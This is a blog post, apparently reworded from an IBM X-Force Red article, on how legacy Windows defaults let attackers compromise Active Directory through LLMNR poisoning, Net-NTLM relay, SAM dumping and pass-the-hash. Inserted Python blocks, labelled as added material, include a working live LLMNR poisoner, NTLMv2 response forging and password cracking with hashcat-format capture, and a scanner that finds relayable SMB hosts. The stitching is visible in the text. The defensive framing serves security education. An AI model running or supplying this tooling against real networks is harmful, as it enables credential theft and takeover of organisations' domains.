
A Modern-Day Network’s Compromise Method

Posted by Marbenz Antonio on August 24, 2022


Over the past twenty years, a sinister problem has been growing slowly under the noses of security experts and IT administrators. As businesses grew to satisfy the technological needs of the early 2000s, they came to rely on insecure technology installed deep within their internal network stacks.

Although security has improved and patches exist for most known vulnerabilities, many businesses have been unable to apply them because of their dependence on legacy technology. Of the on-premise Active Directory deployments X-Force Red examined in 2022, 90% were vulnerable to attack because of the presence of these older technologies. Enterprise networks have also become dramatically more complex, creating a vast landscape of misconfigurations. In the X-Force Threat Intelligence Index 2022, we noted that a large number of attacks make use of exactly these misconfigurations.

For decades, organizations have concentrated on hardening their perimeter on the presumption that attackers could be kept out of the network entirely. As hackers, we can assure you that there is always a way in. Always. This is not news, and corporations are quickly switching to new approaches; zero trust is a significant component of them, and according to our 2022 Cost of a Data Breach analysis, 41% of enterprises have already adopted its tenets. As organizations look forward to new strategies and solutions, they must also look back at their decades of technical debt.

The Challenge of Growing Complexity

A network’s complexity rises rapidly with the number of devices it contains. Scalable access management and device aggregation solutions exist because maintaining control and effective oversight over a large number of systems is extremely difficult. Windows Active Directory (AD), which lets network administrators manage devices, credentials, users, and their permissions from a single location, is the most popular answer to this administration and access control challenge. As AD environments grow, however, managing, analyzing, and visualizing user security relationships at scale becomes hard, and visibility into who holds which permissions within the domain suffers. And that applies to just one domain.

These problems with permission visibility become more pronounced in larger organizations, where a forest can consist of many domains (or an environment can contain multiple forests). As networks developed in the early 2000s, manually applied configuration changes accumulated. Over time, as the people responsible for these environments moved on, organizations found themselves burdened with a pile of unused and forgotten permissions. Today’s network administrators struggle to identify and manage that pile. And manage it they must, because the shadow of decades of configuration debt still lingers in the deepest recesses of today’s networks.

The Mindset of Compatibility First

In the late 1990s and early 2000s, security was not a top priority, so the devices and communication protocols created in that period carry security problems of their own. Many of these issues have been addressed by modern technology, but organizations built their operational procedures on the outdated models, leading to a sustained reliance on legacy hardware and communication standards.

Businesses often prioritize keeping current operations running over adopting new technology, particularly when the change could cause disruption or downtime. Many IT administrators would prefer to retire obsolete equipment but cannot, because of the various dependencies on it inside their company. Less often, some are simply complacent and see no need to replace a piece of software that still works. In response to this demand for compatibility, vendors shipped their products with legacy behaviour enabled by default: Link-Local Multicast Name Resolution (LLMNR) on, Net-NTLMv1 still accepted, and SMB signing not required. As a result, some networks are still exposed to threats that were addressed more than ten years ago.

Active Directory’s Function in Contemporary Networks

Let’s pause to discuss Active Directory’s significance. In most enterprises, Active Directory is the primary management tool for virtually all Windows devices, and often for numerous Linux systems as well. Any Active Directory administrator therefore has total authority over every joined system.

Knowing this, threat actors, red teams, and phishing campaigns usually concentrate on compromising Active Directory, because doing so gives them total control of an organization’s IT infrastructure.

Windows has gained an increasing number of capabilities that help harden Windows environments, but the focus on compatibility by default means modern Windows computers still run vulnerable services that can lead to a complete compromise of an Active Directory environment.

The Breach of Modern Networks by Old Attacks

Although the Windows operating system has been the target of several new attacks recently, many breaches can be traced to old attack methods rather than cutting-edge vulnerability research. Most Windows networks are still susceptible to attacks that have existed for more than 20 years. To illustrate the problem, let’s walk through a sample attack path inside a business network.

Scenario for an internal penetration test

To set the scene, put yourself in the position of an average pentester. You have just been dropped onto a new network and tasked with an internal penetration test. Your jump-box sits in a subnet containing the desktop computers of hundreds of users. You survey your surroundings, perform reconnaissance of the environment, and identify every Windows system. The logical next step is an authentication coercion attack.


Performing Authentication Coercion

Windows enables three broadcast-level name resolution protocols by default: LLMNR, Multicast DNS (mDNS), and NetBIOS Name Service (NBT-NS). If you are not familiar with broadcast-level name resolution, imagine someone shouting to everyone nearby on the street, “Where is this store?” Anyone in the crowd may answer with the correct address, or a bad actor could answer and point them toward a pop-up store disguised to resemble the one they asked for. Without realizing it, the customer could walk into the fake storefront and hand the crooks their credit card details.

Similarly, when a computer uses a broadcast-level name resolution protocol to resolve a name to an address, an attacker can answer the request and redirect the device to their own machine, and the system may then automatically send the user’s credentials to the attacker. Technically, the attack works as follows:

  1. A Windows service tries to resolve a name through DNS. If DNS cannot answer, Windows falls back to LLMNR, mDNS, or NBT-NS.
  2. An attacker on the same subnet as the requesting device responds, claiming to be the machine the name resolves to.
  3. Having received the attacker’s address, the device may then try to authenticate to it, sending the user’s credentials over the network via the Net-NTLM protocol.
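The exchange in the three steps above, as an added Python example (not code from the original article or from any tool it mentions): it builds the LLMNR query a Windows host multicasts when DNS fails, the poisoned answer an attacker unicasts back, and a parser for both, following the DNS-style message format of RFC 4795. The hostname `fileserv01`, the transaction ID and the attacker address `10.0.0.66` are constructed sample values; `run_poisoner` is a lab-only live listener and is not invoked when the module is imported.

```python
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # RFC 4795 multicast group; queries go here, answers go unicast
LLMNR_PORT = 5355
TYPE_A, CLASS_IN = 1, 1


def _encode_name(name: str) -> bytes:
    """DNS-style label encoding: length-prefixed labels, zero terminator."""
    return b"".join(bytes([len(l)]) + l.encode() for l in name.strip(".").split(".")) + b"\x00"


def _decode_name(data: bytes, off: int):
    labels = []
    while True:
        n = data[off]
        off += 1
        if n == 0:
            break
        labels.append(data[off:off + n].decode())
        off += n
    return ".".join(labels), off


def build_query(name: str, txid: int) -> bytes:
    """Step 1: what a Windows host multicasts once DNS has failed to resolve `name`."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)   # id, flags, QD, AN, NS, AR
    return header + _encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)


def parse_message(data: bytes) -> dict:
    """Decode header, question and any A-record answers of an LLMNR message."""
    txid, flags, _, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    name, off = _decode_name(data, 12)
    qtype, _ = struct.unpack("!HH", data[off:off + 4])
    off += 4
    answers = []
    for _ in range(an):
        aname, off = _decode_name(data, off)
        atype, _, ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        rdata = data[off:off + rdlen]
        off += rdlen
        answers.append((aname, atype, ttl, socket.inet_ntoa(rdata) if atype == TYPE_A else rdata))
    return {"id": txid, "is_response": bool(flags & 0x8000), "name": name,
            "qtype": qtype, "answers": answers}


def build_poisoned_response(query: bytes, attacker_ip: str) -> bytes:
    """Step 2: the attacker's reply. Same transaction ID and question, QR bit set,
    and one A record pointing the name at the attacker's own address."""
    q = parse_message(query)
    header = struct.pack("!HHHHHH", q["id"], 0x8000, 1, 1, 0, 0)
    question = _encode_name(q["name"]) + struct.pack("!HH", q["qtype"], CLASS_IN)
    answer = (_encode_name(q["name"]) + struct.pack("!HHIH", TYPE_A, CLASS_IN, 30, 4)
              + socket.inet_aton(attacker_ip))
    return header + question + answer


def run_poisoner(attacker_ip: str, replies: int = 1):
    """Live version for a lab network: join the LLMNR group and answer each A query with attacker_ip."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("", LLMNR_PORT))
    s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP,
                 socket.inet_aton(LLMNR_GROUP) + socket.inet_aton("0.0.0.0"))
    for _ in range(replies):
        data, addr = s.recvfrom(1024)
        q = parse_message(data)
        if not q["is_response"] and q["qtype"] == TYPE_A:
            s.sendto(build_poisoned_response(data, attacker_ip), addr)   # unicast back to the asker
            print(f"{addr[0]} asked for {q['name']!r}; answered with {attacker_ip}")


if __name__ == "__main__":
    query = build_query("fileserv01", 0x1234)              # constructed: victim's multicast query
    reply = build_poisoned_response(query, "10.0.0.66")    # hypothetical attacker address
    print(parse_message(reply))
```

The victim host then connects to whatever address came back and, for an SMB share or HTTP resource, starts Net-NTLM authentication with the logged-on user's credentials, which is step 3. Nothing in the reply is authenticated, which is why disabling LLMNR and NBT-NS via Group Policy removes this vector entirely.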

SMB Signing and Net-NTLM Relaying

Before we can understand what can be done with these newly acquired credentials, we need a high-level picture of how Net-NTLM works. Net-NTLM is a challenge-response protocol: the server poses the client a question to which it already knows the answer, and if the client answers correctly it is authenticated. The question is, in effect, “can you transform this random value using a key derived from your password hash?” (NTLMv1 encrypts the challenge with DES keys derived from the NT hash; NTLMv2 computes an HMAC-MD5 over it, keyed with a hash derived from the NT hash.) The steps are as follows:

  1. When the user enters their username and password, the password is hashed with the NT hashing algorithm (MD4 over the UTF-16LE password).
  2. The client submits an authentication request.
  3. The server generates a random value to serve as the challenge.
  4. The server computes its own answer by taking the user’s NT hash from its local database (or, for domain accounts, handing the exchange to a domain controller) and transforming the challenge with it.
  5. The client receives the challenge.
  6. The client performs the same transformation on the challenge using the user’s NT hash as the key and sends the result to the server.
  7. The server compares the client’s response with its own. If they match, authentication succeeds.

With that understanding of Net-NTLM, let’s look at what we can do with the credentials we intercepted. Password cracking is one option, but it may not succeed if the password is complex. Passing the hash is not an option: what we intercepted is a Net-NTLM challenge-response, not the NT hash, so it cannot simply be replayed. That leaves the protocol’s native weakness, the Net-NTLM relay attack. A threat actor coerces authentication and then relays each message of the exchange to a target as it happens. If the relayed user has local administrator rights on that target, the threat actor gains immediate control of the machine.

To understand what a Net-NTLM relay attack is, let’s continue with our earlier illustration. When our victim asked where a store was, the attacker overheard and steered the unsuspecting customer to their fake shop. This time the victim pays with their phone, which generates a unique, time-limited code that can withdraw money from the account exactly once. The attacker relays that code to a real shop’s checkout and makes a single purchase on the victim’s account.

A Net-NTLM relay attack works the same way. When we coerced the login, the victim authenticated to our machine. Instead of accepting that authentication ourselves, we can forward each message of the exchange to a different device, which sees the login attempt as coming from the victim, not from us.

Microsoft introduced SMB signing in Windows 2000, more than 20 years ago, to defend against Net-NTLM relay and other man-in-the-middle attacks. With signing, the session key established during Net-NTLM authentication is used to sign every SMB message, so a message cannot be altered in transit, or sent by a party that does not hold the key. Theoretically, this attack vector should have been neutralized long ago. In reality, no Windows edition other than a domain controller requires SMB signing by default; workstations and member servers merely support it, so they will happily talk to a peer that does not sign. Because of this, most businesses are unaware that the operating system they run is, by default, susceptible to a 20-year-old attack.
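The challenge-response steps above, the relay, and the reason signing stops it, as an added Python example (not from the original article, and not IBM’s or Microsoft’s code). It implements the NTLMv2 variant of Net-NTLM as specified in MS-NLMP: the NT hash (MD4 of the UTF-16LE password, in pure Python because OpenSSL 3 builds often disable MD4), the NTLMv2 response, the server-side check, offline cracking of a captured response, and the session base key from which SMB signing keys are derived. The user `jdoe`, domain `CORP`, password `Winter2022!` and the wordlist are constructed sample values; NTLMv1 is omitted.

```python
import hashlib
import hmac
import os
import struct


def _md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's md4 is frequently unavailable under OpenSSL 3)."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    f = lambda x, y, z: (x & y) | (~x & mask & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    k2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    k3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):
            a = rotl((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = rotl((a + g(b, c, d) + x[k2[i]] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = rotl((a + h(b, c, d) + x[k3[i]] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """Step 1: NT hash = MD4(UTF-16LE password). Unsalted, so the hash alone suffices to authenticate."""
    return _md4(password.encode("utf-16le"))


def ntlmv2_key(nt: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 (MS-NLMP 3.3.2): HMAC-MD5 keyed with the NT hash over UPPER(user) + domain."""
    return hmac.new(nt, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def ntlmv2_response(nt, user, domain, server_challenge, client_challenge, timestamp=0, target_info=b""):
    """Step 6, client side: NTProofStr = HMAC-MD5(key, ServerChallenge || blob); response = NTProofStr || blob."""
    blob = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)
    proof = hmac.new(ntlmv2_key(nt, user, domain), server_challenge + blob, hashlib.md5).digest()
    return proof + blob


def server_verify(nt, user, domain, server_challenge, response) -> bool:
    """Steps 4 and 7, server side: recompute NTProofStr from the stored NT hash and compare."""
    proof, blob = response[:16], response[16:]
    expected = hmac.new(ntlmv2_key(nt, user, domain), server_challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


def session_base_key(nt, user, domain, response) -> bytes:
    """Key material SMB signing is derived from: HMAC-MD5(key, NTProofStr). Requires the NT hash."""
    return hmac.new(ntlmv2_key(nt, user, domain), response[:16], hashlib.md5).digest()


def hashcat_line(user, domain, server_challenge, response) -> str:
    """Captured NetNTLMv2 in the user::domain:challenge:proof:blob format (hashcat mode 5600)."""
    return f"{user}::{domain}:{server_challenge.hex()}:{response[:16].hex()}:{response[16:].hex()}"


def crack(user, domain, server_challenge, response, candidates):
    """Offline cracking of a captured response: recompute NTProofStr for each candidate password."""
    for pw in candidates:
        if server_verify(nt_hash(pw), user, domain, server_challenge, response):
            return pw
    return None


def relay_demo(password="Winter2022!", user="jdoe", domain="CORP") -> dict:
    """Relay, simulated in one process: victim (has the password) <-> attacker (has nothing) <-> target.
    The attacker only forwards bytes; it never sees the NT hash or the session key."""
    victim_nt = nt_hash(password)          # derived on the victim's workstation at logon
    target_nt = victim_nt                  # the target (via its DC) knows the same NT hash
    challenge = os.urandom(8)              # target -> attacker -> victim, forwarded unchanged
    resp = ntlmv2_response(victim_nt, user, domain, challenge, os.urandom(8), timestamp=0x01D8B7C05B7F0000)
    accepted = server_verify(target_nt, user, domain, challenge, resp)   # victim -> attacker -> target
    # Both real endpoints can derive the signing key; the attacker, holding only challenge and resp, cannot.
    keys_match = session_base_key(victim_nt, user, domain, resp) == session_base_key(target_nt, user, domain, resp)
    return {"target_accepted": accepted, "keys_match": keys_match,
            "captured": hashcat_line(user, domain, challenge, resp)}


if __name__ == "__main__":
    print(relay_demo())
```

`relay_demo` shows both halves of the story: the target accepts `challenge` and `resp` forwarded verbatim, so relay works when signing is not required, but `session_base_key` needs the NT hash, which neither value reveals, so a signing-required target rejects the attacker's unsigned or mis-signed messages. The same property explains pass-the-hash: every function takes the NT hash, never the password. `crack` is what a cracker does with a `hashcat_line` capture, one NT hash per guess, which is why complex passwords make that route slow.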

Returning to our scenario, your analysis of the recon data shows that most hosts do not require SMB signing. Armed with that, you launch your authentication coercion attacks and feed any coerced authentication to a tool configured to relay it to the exposed servers. After three minutes, you relay a user with local administrator rights on one of the devices.
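The check a pentester runs in the recon phase to produce that list, as an added Python example (not from the original article): it sends a bare SMB2 NEGOTIATE to port 445 and reads the SecurityMode field of the response (MS-SMB2 2.2.4), where bit 0x1 means signing is enabled and bit 0x2 means it is required; only a required-signing host defeats relay. `build_negotiate_response` is a constructed server reply used for an offline demonstration; `check_host` is the live version, for hosts you are authorized to test.

```python
import socket
import struct
import uuid

SMB2_NEGOTIATE = 0x0000
SIGNING_ENABLED, SIGNING_REQUIRED = 0x0001, 0x0002
DIALECTS = (0x0202, 0x0210, 0x0300, 0x0302)   # 3.1.1 left out: it needs negotiate contexts


def smb2_header(command: int, flags: int = 0, status: int = 0) -> bytes:
    """64-byte SMB2 header (MS-SMB2 2.2.1): ProtocolId, StructureSize, CreditCharge, Status, Command,
    Credits, Flags, NextCommand, MessageId, Reserved, TreeId, SessionId, Signature."""
    return (b"\xfeSMB" + struct.pack("<HHIHHIIQIIQ", 64, 0, status, command, 1, flags, 0, 0, 0, 0, 0)
            + b"\x00" * 16)


def _nbss(msg: bytes) -> bytes:
    """NetBIOS session service framing on 445: zero type byte plus 3-byte big-endian length."""
    return struct.pack(">I", len(msg)) + msg


def build_negotiate_request() -> bytes:
    """NEGOTIATE request (MS-SMB2 2.2.3): we advertise signing enabled but not required."""
    body = struct.pack("<HHHHI16sQ", 36, len(DIALECTS), SIGNING_ENABLED, 0, 0, uuid.uuid4().bytes, 0)
    body += b"".join(struct.pack("<H", d) for d in DIALECTS)
    return _nbss(smb2_header(SMB2_NEGOTIATE) + body)


def build_negotiate_response(security_mode: int, dialect: int = 0x0302) -> bytes:
    """Constructed server reply (MS-SMB2 2.2.4) for the offline demo; field layout matches a real host."""
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0, b"\x00" * 16, 0,
                       0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0)
    return _nbss(smb2_header(SMB2_NEGOTIATE, flags=0x1) + body)   # 0x1 = SERVER_TO_REDIR


def parse_security_mode(raw: bytes) -> dict:
    """Extract dialect and signing policy from a NetBIOS-framed NEGOTIATE response."""
    length = struct.unpack(">I", raw[:4])[0] & 0x00FFFFFF
    msg = raw[4:4 + length]
    if msg[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 message (SMB1-only host?)")
    status, command = struct.unpack("<IH", msg[8:14])
    if command != SMB2_NEGOTIATE or status != 0:
        raise ValueError(f"unexpected command {command:#x} / status {status:#x}")
    struct_size, sec_mode, dialect = struct.unpack("<HHH", msg[64:70])
    if struct_size != 65:
        raise ValueError("bad NEGOTIATE response structure size")
    required = bool(sec_mode & SIGNING_REQUIRED)
    return {"dialect": dialect, "signing_enabled": bool(sec_mode & SIGNING_ENABLED),
            "signing_required": required, "relayable": not required}


def check_host(host: str, port: int = 445, timeout: float = 3.0) -> dict:
    """Live check: negotiate with one host and report whether it is a viable relay target."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        hdr = s.recv(4)
        length = struct.unpack(">I", hdr)[0] & 0x00FFFFFF
        data = b""
        while len(data) < length:
            chunk = s.recv(length - len(data))
            if not chunk:
                break
            data += chunk
    return parse_security_mode(hdr + data)


if __name__ == "__main__":
    # Constructed replies: a default workstation (signing enabled only) and a domain controller (required).
    print("workstation:", parse_security_mode(build_negotiate_response(SIGNING_ENABLED)))
    print("DC:        ", parse_security_mode(build_negotiate_response(SIGNING_ENABLED | SIGNING_REQUIRED)))
```

A default Windows workstation or member server answers with SecurityMode 0x1, which is exactly the "enabled but not required" state the article describes; a domain controller answers 0x3. Feeding the hosts where `relayable` is true to a relay tool is what the scenario's next sentence does.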

Shared credentials

Poor credential hygiene on corporate networks is one of the most important problems the IBM X-Force Red internal penetration testing team has encountered over the years. Dumping the local SAM database is one of the most common ways to move laterally after compromising a device. This database holds the password hashes of all local accounts, including the local administrator. Once that hash is obtained, the local administrator username and hash can be sprayed across the environment by passing the hash, which frequently yields lateral movement inside the domain.

In our example, you gained local administrator rights on a system and dumped its SAM database. Spraying those credentials, you discovered that a domain controller shared the same local administrator password, giving you immediate control of the environment.

Final Thoughts

Threat actors today are more proficient than ever at navigating networks. For defenders to have a better chance of thwarting them, organizations need to move away from defaults that are convenient but insecure. Executives must understand the risks of decades of unresolved technical debt, and IT administrators must be trained to ensure that unneeded services are disabled in their operating systems. Rather than simply accepting the danger of outdated technology, organizations must invest in work that encourages developers to produce secure replacements for legacy code that can be deployed quickly and with minimal disruption.
